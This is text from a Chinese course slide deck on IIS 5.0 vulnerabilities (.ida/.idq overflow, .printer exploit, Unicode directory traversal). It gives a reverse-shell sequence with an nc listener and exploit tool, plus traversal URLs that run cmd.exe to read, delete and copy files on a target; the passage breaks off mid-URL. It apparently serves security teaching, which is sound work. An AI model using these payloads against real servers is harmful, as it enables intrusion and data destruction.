05基于漏洞的入侵及其防范之二.pptVIP

* * IIS中的漏洞利用与防范 IIS中的漏洞 IIS5.0是Windows 2000中附带的Web服务器，功能很强大，但是漏洞也比较多。据说，现在已经发现了IIS5.0的一千多个漏洞。也许更多的还没有被发现。 Windows 2000中的Internet 信息服务 IIS常见漏洞 .IDA.IDQ漏洞 Printer漏洞 Unicode漏洞 .asp映射分块编码漏洞 Webdav漏洞 漏洞的原因：ida和idq是iis中用来提供索引服务的一种文件。如果在Web服务器中存在这种文件，那么客户可以从浏览器中请求这种文件进行数据查询。Iis会把客户的请求转给一个名为idq.dll的动态连接库进行处理 Idq.dll文件中存在一个缓冲区溢出漏洞。当超过指定长度的请求被传进来的时候，服务器会出错。如果该请求被黑客精心构造（这种请求数据称为shellcode），服务器会执行请求数据中的程序代码。成功利用该漏洞，可以以管理员的身份运行Shellcode，进行可能完全控制该服务器。 ida..idq漏洞 一个idaidq漏洞的攻击工具 .printer漏洞的利用 使用工具：IIS5.Printer Exploit进行漏洞利用 入侵过程： 在本地用NC打开一个监听端口：nc –l –p 250 用“IIS5Exploit [目标IP] [本地IP] 250” 命令对远程主机进行漏洞溢出 在获得远程主机的命令窗口后，可建立账号 Unicode目录遍历漏洞(教材P143) Unicode 目录遍历也是IIS上一个著名的漏洞 Nimda(尼姆达)病毒利用了该病毒进行传播 SP2和之前的版本中存在 借助于该漏洞，可以访问与Web根目录在同一个驱动器上的文件。如果该驱动器是安装系统的驱动器，则可以访问cmd.exe，并可以以 IUSR_machinename (这里的machinename是机器名，该帐号在安装IIS的时候自动建立)的身份运行命令 利用该漏洞，一般不能直接获取服务器的管理员权限，但是一般可以修改Web服务器上的网页内容，获得网站的控制权。 配合Windows和IIS的其他漏洞，一般可以得到系统管理员的权限 利用该漏洞，可以在IE中执行远程命令 漏洞的探查 可以使用XScan进行扫描，也可以手工测试 在Windows中，..表示上层目录，所以在命令中可以使用 ..\..表示上层的上层。但在iis中如果直接输入 ..\..将被过滤掉。但是编程人员犯了一个错误，可以使用 unicode字符（如%c1%1c）表示”/”，而这样并不会被过滤，因而可以正常访问。 利用Unicode漏洞操作目标主机文件 1.显示文件内容 如果想显示目标主机里面的一个名为lucky.txt文本文件，输人下面这行命令即可(要显示htm, asp, bat等文件都用同样的方法): http://216.246.X.X/scripts/..%c1%1c../winnt/ system32/cmd.exe?/c+type+c:\lucky.txt 这样该文件的内容就可以通过IE显示出来。 2.删除文件 输入如下命令，即可删除主机上lucky.txt文件: http://216.246.X.X/scripts/..%c1%1c../winnt/ system32/cmd.exe?/c+del+c:\lucky.tx 3.copy文件的同时将该文件改名 输入如下命令，即可将主机上的lucky.txt改名为luck.txt： http://216.246.X.X/scripts/..%c1%1c../winnt/ system32/cmd.exe?/c+copy+c:\lucky.txt luck.txt 4.COPY文件到另外的文件夹 输入如下命令，就可以主机上的c:\lucky文件夹下的文件全部copy到c:\inetpub\wwwroot下了: http://216.246.X.X/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+xcopyc:\luckyc:\inetpub\wwwroot attrib命令使用示例 运行下面的命令，可以看到目标主机C:\inetpub\wwwroot下的index.htm文件的属性: http://216.246.X.X/scripts/..%c1%1c../winnt/system32/attrib.exe?c:\inetpub\wwwroot\index.htm 运行下面的命令，把目标主机c:\inetpub\wwwroot下的index.htm文件设为只读、隐藏属性: http://216.246.X.X/scripts/..%c